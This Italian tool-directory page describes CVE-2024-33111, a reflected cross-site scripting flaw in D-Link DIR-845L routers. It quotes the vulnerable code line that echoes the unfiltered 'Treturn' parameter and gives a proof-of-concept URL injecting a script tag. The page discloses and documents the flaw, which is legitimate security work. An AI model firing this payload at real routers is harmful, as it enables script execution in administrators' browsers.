Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-33111 — Il router D-Link DIR-845L è vulnerabile a Cross Site Scripting (XSS) tramite /htdocs/webinc/js/bsc_sms_inbox.php. | Kitploit
Strumenti/GitHubGitHub/fallenskill1/cve-2024-33111
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubfallenskill1/cve-2024-33111

CVE-2024-33111

Il router D-Link DIR-845L è vulnerabile a Cross Site Scripting (XSS) tramite /htdocs/webinc/js/bsc_sms_inbox.php.

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-33111

I router D-Link DIR-845L versione 1.01KRb03 e precedenti sono vulnerabili a Cross Site Scripting (XSS) tramite /htdocs/webinc/js/bsc_sms_inbox.php.

Componente Vulnerabile

  • /htdocs/webinc/js/bsc_sms_inbox.php

Dettagli Tecnici

La vulnerabilità è dovuta alla mancanza di filtraggio nel parametro $_GET["Treturn"] che viene utilizzato direttamente nel codice alla riga 17 di bsc_sms_inbox.php.

Lo snippet di codice vulnerabile:

root@kitploit:~
var get_Treturn = '`<?if($_GET["Treturn"]=="") echo "0"; else echo $_GET["Treturn"];?>';

PoC

root@kitploit:~
http://IP:8080/bsc_sms_inbox.php?Treturn=%27%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E

image

Scarica lo strumento